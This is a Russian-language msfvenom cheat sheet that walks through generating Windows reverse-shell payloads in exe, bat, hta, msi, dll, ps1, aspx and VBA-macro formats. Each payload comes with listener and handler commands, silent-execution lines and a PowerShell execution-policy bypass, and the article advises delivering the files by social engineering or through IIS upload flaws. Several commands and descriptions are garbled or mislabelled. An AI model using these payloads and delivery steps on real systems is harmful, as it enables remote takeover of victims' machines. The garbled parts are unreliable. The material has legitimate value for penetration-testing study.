В этой статье вы узнаете, как использовать MsfVenom для создания всех типов полезных данных для использования платформы Windows. Прочтите руководство для начинающих отсюда.А в этой статье рассмотрим Шпаргалка по Msfvenom: Эксплуатация в Windows
MsfVenom — это автономный генератор полезной нагрузки Metasploit, который также является заменой msfpayload и msfencode.
Полезная нагрузка — это вредоносные сценарии, которые злоумышленник использует для взаимодействия с целевой машиной с целью ее компрометации. Msfvenom поддерживает следующую платформу и формат для создания полезной нагрузки. Формат вывода может быть в виде исполняемых файлов, таких как exe, php, dll, или в виде однострочного файла.
Два основных типа полезной нагрузки
Stager: они обычно обозначаются вторым (/), например windows / meterpreter / reverse_tcp.
Stageless: использование _ вместо второго / в имени полезной нагрузки, например windows / meterpreter_reverse_tcp
Как мы уже упоминали выше, эта статья может помочь вам изучить все возможные методы создания различных форматов полезной нагрузки для использования платформы Windows.
Тип полезной нагрузки: Stager
Выполнение следующей команды для создания вредоносного exe-файла — это распространенное расширение имени файла, обозначающее исполняемый файл для Microsoft Windows.
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f exe > shell.exe
Весь вредоносный код будет записан внутри файла shell.exe
и будет выполняться на целевой машине как исполняемая программа.
Поделитесь этим файлом с помощью тактики социальной инженерии и дождитесь выполнения цели. Тем временем запустите netcat в качестве прослушивателя для перехвата обратного соединения.
nc –lvp 443
Тип полезной нагрузки: Stager
Выполните следующую команду, чтобы создать вредоносный пакетный файл, расширение имени файла .bat используется в DOS и Windows.
msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.3 lport=443 > shell.bat
Весь вредоносный код будет записан внутри файла shell.bat и будет выполняться как сценарий .bat на целевой машине.
Поделитесь этим файлом с помощью тактики социальной инженерии и дождитесь выполнения цели. Тем временем запустите netcat в качестве прослушивателя для перехвата обратного соединения.
nc –lvp 443
Тип полезной нагрузки: Stager
Приложение HTML (HTA) — это программа Microsoft Windows, исходный код которой состоит из HTML, динамического HTML и одного или нескольких языков сценариев, поддерживаемых Internet Explorer, например VBScript или JScript.
Выполните следующую команду, чтобы создать вредоносный файл HTA, расширение файла .hta используется в DOS и Windows.
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta
Весь вредоносный код будет записан внутри файла shell.hta и будет выполняться как сценарий .hta на целевой машине. Используйте HTTP-сервер Python для обмена файлами.
mshta http://192.168.1.3/shell.hta
HTA выполняется с помощью программы mshta.exe
или двойным щелчком по файлу.
Это приведет к обратному соединению через прослушиватель netcat, который работал в фоновом режиме для перехвата обратного соединения.
nc –lvp 443
Установщик Windows также известен как установщик Microsoft. Файл MSI — это пакет Windows, который предоставляет информацию об установке для определенного установщика, например программы, которые необходимо установить. Его можно использовать для установки обновлений Windows или стороннего программного обеспечения, такого же как exe.
Выполните следующую команду, чтобы создать вредоносный файл MSI, расширение имени файла .msi используется в DOS и Windows. Перенести вредоносную программу в целевую систему и запустить ее.
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f msi > shell.msi
Используйте команду msiexec для запуска файла MSI.
msiexec /quiet /qn /i shell.msi
Это приведет к обратному соединению через прослушиватель netcat, который работал в фоновом режиме для перехвата обратного соединения.
Тип полезной нагрузки: Stager
DLL — это библиотека, содержащая код и данные, которые могут использоваться более чем одной программой.
Выполните следующую команду, чтобы создать вредоносный файл DLL, расширение файла .dll используется в DOS и Windows. Перенести вредоносную программу в целевую систему и запустить ее.
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f dll > shell.dll
Используйте команду rundll32 для запуска файла MSI.
rundll32.exe shell.dll,0
Это приведет к обратному соединению через прослушиватель netcat, который работал в фоновом режиме для перехвата обратного соединения.
Тип полезной нагрузки: Stager
Формат — psh, psh-net, psh-reflection или psh-cmd.
msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.3 lport=443 -f psh-cmd > -f raw
Тип полезной нагрузки: Stager
Файл PS1 — это сценарий или «командлет», используемый Windows PowerShell. Файлы PS1 похожи на файлы .BAT и .CMD, за исключением того, что они выполняются в Windows PowerShell вместо командной строки Windows.
Выполните следующую команду, чтобы создать вредоносный сценарий PS1 с расширением имени файла. PS1 используется в Windows PowerShell.
msfvenom -p windows/x64/meterpreter_reverse_https lhost=192.168.1.3 lport=443 -f psh > shell.ps1
Поскольку обратный тип оболочки — meterpreter, нам нужно запустить эксплойт / мульти / обработчик внутри фреймворка Metasploit.
Политика выполнения PowerShell — это функция безопасности, которая контролирует условия, при которых PowerShell загружает файлы конфигурации и запускает сценарии. Эта функция помогает предотвратить выполнение вредоносных скриптов. Запрещает запуск всех файлов сценариев, включая файлы форматирования и конфигурации (.ps1xml), файлы сценариев модулей (.psm1) и профили PowerShell (.ps1).
Подробнее читайте здесь
Чтобы выполнить сценарий PS1, вам необходимо обойти политику выполнения, выполнив следующую команду в Windows PowerShell и выполнив сценарий.
PowerShell –ep bypass
.\shell.ps1
msfconsole
use exploit/multi/handler
set lhost 192.168.1.3
set lport 443
set payload windows/x64/meterpreter_reverse_https
Тип полезной нагрузки: бесступенчатый
Файл ASPX — это файл Active Server Page Extended для платформы Microsoft ASP.NET. При просмотре URL-адреса эти страницы отображаются в веб-браузере пользователя. Другое название для них — веб-формы .NET.
Выполните следующую команду, чтобы создать вредоносный сценарий aspx с расширением файла .aspx.
msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.1.3 lport=443 -f aspx > shell.aspx
Поскольку обратный тип оболочки — meterpreter, нам нужно запустить эксплойт / мульти / обработчик внутри фреймворка metasploit.
Вы можете внедрить эту полезную нагрузку для использования уязвимости неограниченной загрузки файлов, если целью является веб-сервер IIS.
Выполните сценарий загрузки в веб-браузере.
msfconsole
use exploit/multi/handler
set lhost 192.168.1.3
set lport 443
set payload windows/x64/meterpreter_reverse_https
Тип полезной нагрузки: бесступенчатый
VBA — это расширение файла, обычно связанное с Visual Basic, которое поддерживает такие приложения Microsoft, как Microsoft Excel, Office, PowerPoint, Word и Publisher. Он используется для создания «макросов». который работает в Excel. Злоумышленник пользуется привилегиями этих функций и создает вредоносный сценарий VB, который будет выполняться как программа макросов с Microsoft Excel.
Выполните следующую команду, чтобы создать вредоносный сценарий aspx с расширением имени файла .aspx, который будет выполняться как макрос в Microsoft Excel.
Подробнее читайте здесь: Несколько способов использования систем Windows с помощью макросов
msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.1.3 lport=443 -f vba
Теперь мы открываем нашу рабочую книгу, в которую внедрены вредоносные макросы.
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.1.106
set lport 1234
exploit
Как только злоумышленник выполнит вредоносный скрипт, он получит обратное соединение через сессию метерпредставителя.
Конечной целью является полная автоматизация msfvenom и Metasploit для упрощения жизни пользователя (меню выбора IP, ресурсного файла/команд msfconsole, пакетное создание полезной нагрузки и возможность вводить любые аргументы в любом порядке (в различных форматах/шаблонах).
Чтобы взломать сеть Wi-Fi с помощью Kali Linux, вам нужна беспроводная карта, поддерживающая режим мониторинга…
Работа с консолью считается более эффективной, чем работа с графическим интерфейсом по нескольким причинам.Во-первых, ввод…
Конечно, вы также можете приобрести подписку на соответствующую услугу, но наличие SSH-доступа к компьютеру с…
С тех пор как ChatGPT вышел на арену, возросла потребность в поддержке чата на базе…
Если вы когда-нибудь окажетесь в ситуации, когда вам нужно взглянуть на спектр беспроводной связи, будь…
Elastic Security стремится превзойти противников в инновациях и обеспечить защиту от новейших технологий злоумышленников. В…